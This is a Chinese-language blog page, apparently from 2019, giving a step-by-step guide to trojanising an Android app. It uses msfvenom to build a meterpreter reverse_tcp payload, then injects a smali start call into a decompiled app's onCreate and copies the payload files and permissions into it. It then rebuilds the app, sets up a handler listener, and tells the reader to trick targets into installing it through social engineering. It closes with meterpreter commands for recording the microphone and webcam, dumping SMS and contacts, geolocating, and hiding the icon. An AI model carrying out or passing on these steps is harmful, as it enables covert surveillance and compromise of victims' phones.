<!DOCTYPE html>
<html lang="en">
<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="google-site-verification" content="xBT4GhYoi5qRD5tr338pgPM5OWHHIDR6mNg1a3euekI">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="">
    <meta name="keyword" content="">
    <link rel="shortcut icon" href="/img/favicon.ico">

    <title>
        
        手动给Android应用注入Payload - undefined
        
    </title>

    <!-- Custom CSS -->
    <link rel="stylesheet" href="/css/aircloud.css">
    <link rel="stylesheet" href="/css/gitment.css">
    <!--<link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">-->
    <link href="//at.alicdn.com/t/font_620856_pl6z7sid89qkt9.css" rel="stylesheet" type="text/css">
    <!-- ga & ba script hoook -->
    <script></script>
</head>

<body>

<div class="site-nav-toggle" id="site-nav-toggle">
    <button>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
    </button>
</div>

<div class="index-about">
    <i>  </i>
</div>

<div class="index-container">
    
    <div class="index-left">
        
<div class="nav" id="nav">
    <div class="avatar-name">
 
        <div class="name">
            <i>K</i>
        </div>
    </div>
    <div class="contents" id="nav-content">
        <ul>
            <li>
                <a href="/">
                    <i class="iconfont icon-shouye1"></i>
                    <span>主页</span>
                </a>
            </li>
            <li>
                <a href="/tags">
                    <i class="iconfont icon-biaoqian1"></i>
                    <span>标签</span>
                </a>
            </li>
            <li>
                <a href="/archives">
                    <i class="iconfont icon-guidang2"></i>
                    <span>存档</span>
                </a>
            </li>
            <li>
                <a href="/about/">
                    <i class="iconfont icon-guanyu2"></i>
                    <span>关于</span>
                </a>
            </li>
            
            <li>
                <a id="search">
                    <i class="iconfont icon-sousuo1"></i>
                    <span>搜索</span>
                </a>
            </li>
            
        </ul>
    </div>
    
        <div id="toc" class="toc-article">
    
</div>
    
</div>


<div class="search-field" id="search-field">
    <div class="search-container">
        <div class="search-input">
            <span id="esc-search"> <i class="icon-fanhui iconfont"></i></span>
            <input id="search-input">
            <span id="begin-search">搜索</span>
        </div>
        <div class="search-result-container" id="search-result-container">

        </div>
    </div>
</div>
        <div class="index-about-mobile">
            <i>  </i>
        </div>
    </div>
    
    <div class="index-middle">
        <!-- Main Content -->
        


<div class="post-container">
    <div class="post-title">
        手动给Android应用注入Payload
    </div>

    <div class="post-meta">
        <span class="attr">发布于：<span>2019-02-25 06:53:12</span></span>
        
        <span class="attr">标签：/
        
        <a class="tag" href="/tags/#Android" title="Android">Android</a>
        <span>/</span>
        
        
        </span>
        <span class="attr">访问：<span id="busuanzi_value_page_pv"></span>
</span>

    </div>
    <div class="post-content ">
        <p>###如何给Android应用写入木马</p>
<p>#####文章中介绍的工具、技术带有一定的攻击性，仅供安全研究，请合理合法使用。</p>
<p>#####本文原创作者：XXX，本文属i春秋原创奖励计划，未经许可禁止转载！</p>
<p>####需要用到的工具：<br>    逆向工具：Android killer<br>    木马工具：Metasploit<br>5G时代的来临，让移动安全受到更大的热潮，而我刚好蹭下热点。现在大多数的安卓应用都可以轻易的使用一些反汇编软件能够轻松的对安卓应用进行植入木马病毒和恶意Payload。</p>
<p>####第一步：使用Metasploit生成需要的Payload<br><code>msf5 &gt; msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.10.1 LPORT=4444 -o shell.apk</code><br><code>[*] exec: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.10.1 LPORT=4444 -o shell.apk</code><br><code>[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload</code><br><code>[-] No arch selected, selecting arch: dalvik from the payload</code><br><code>No encoder or badchars specified, outputting raw payload</code><br><code>Payload size: 10090 bytes</code><br><code>Saved as: shell.apk</code></p>
<p>####第二步：反编译Android应用</p>
<p>#####使用反编译软件打开Android应用，我使用的是Android killer软件，其实在kali里面自带反编译软件的。<br><img src="https://p1.ssl.qhimg.com/t01a9f88e716f654bf2.png" alt=""></p>
<p>####第三步：寻找Android应用的入口文件和添加启动代码<br><img src="https://p0.ssl.qhimg.com/t01581fab3e300071cd.png" alt=""><br><img src="https://p5.ssl.qhimg.com/t017796c310b832d4af.png" alt=""><br>然后在onCreate函数里面添加Payload的启动文件<br><code>invoke-static {p0}, Lcom/metasploit/stage/Payload;-&gt;start(Landroid/content/Context;)V</code><br><img src="https://p0.ssl.qhimg.com/t01bb2e6785debf3c6d.png" alt=""></p>
<p>####第四步：添加Payload文件</p>
<p>#####使用反编译软件打开shell.apk，然后找到Metasploit文件<br><img src="https://p2.ssl.qhimg.com/t018cd8e7dc779f30a8.png" alt=""></p>
<p>#####然后把shell.apk下的Metasploit文件复制到需要植入Payload的apk里面的smali文件下的com的里面就可以了。<br><img src="https://p3.ssl.qhimg.com/t01c4c5c193b70fddf7.png" alt=""></p>
<p>####第五步：给Apk增加权限</p>
<p>#####打开shell.apk里面的AndroidManifest.xml，然后复制到需要植入Payload的apk里面的AndroidManifest.xml，需要注意的是权限的申请是唯一的，不能重复，不然可能会出现错误。<br><img src="https://p5.ssl.qhimg.com/t013a27e27ceca6b79e.png" alt=""></p>
<p>#####第六步：编译<br><img src="https://p3.ssl.qhimg.com/t015840998c58d4f624.png" alt=""></p>
<p>#####第七步：在Msf连接Payload<br><code>msf5 &gt; use exploit/multi/handler</code><br><code>msf5 exploit(multi/handler) &gt; set payload android/meterpreter/reverse_tcp</code><br><code>msf5 exploit(multi/handler) &gt; set LHOST 192.168.232.128</code><br><code>msf5 exploit(multi/handler) &gt; set LPORT 1111</code><br><code>msf5 exploit(multi/handler) &gt; exploit</code></p>
<p>#####第八步：利用社会工程学或者网马等技术让目标下载安装该APK，目标安装了该APK后我们就可以对目标的手机进行操作了。</p>
<p>######以下是Metasploit的一些Android Payload的命令<br>    webcam_list  列出网络摄像头<br>    record_mic [ˈrekərd]/记录/  从默认麦克风录制音频为X秒<br>    webcam_chat  开始视频聊天<br>    webcam_snap  从指定的摄像头获取快照<br>    webcam_stream -i 1  从指定的网络摄像头播放视频流[选择后摄像头]<br>    activity_start  从URI字符串启动Android活动<br>    check_root  检查设备是否有根<br>    dump_calllog  获取调用日志<br>    dump_contacts  获取联系人列表<br>    dump_sms  获取短信<br>    geolocate  利用地理定位获取当前LAT<br>    wlan_geolocate  利用WLAN信息获取当前LAT<br>    hide_app_icon  从发射器隐藏应用程序图标<br>    interval_collect  管理区间收集能力<br>    send_sms  从目标会话发送短消息<br>    set_audio_mode<br>    sqlite_query  从存储库查询SQLite数据库<br>    wakelock  启用/禁用Wakelock</p>

        
        <br>
        <div id="comment-container">
        </div>
        <div id="disqus_thread"></div>

        <div id="lv-container">
        </div>

    </div>
</div>

    </div>
</div>


<footer class="footer">
    <ul class="list-inline text-center">
        
        

        

        

        

        

    </ul>
    
    <p>
        <span id="busuanzi_container_site_pv">
            <span id="busuanzi_value_site_pv"></span>PV
        </span>
        <span id="busuanzi_container_site_uv">
            <span id="busuanzi_value_site_uv"></span>UV
        </span>
        Created By <a href="https://hexo.io/">Hexo</a>  Theme <a href="https://github.com/aircloud/hexo-theme-aircloud">AirCloud</a></p>
</footer>




</body>

<script>
    // We expose some of the variables needed by the front end
    window.hexo_search_path = "search.xml"
    window.hexo_root = "/"
    window.isPost = true
</script>
<script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>
<script src="/js/index.js"></script>
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>




</html>
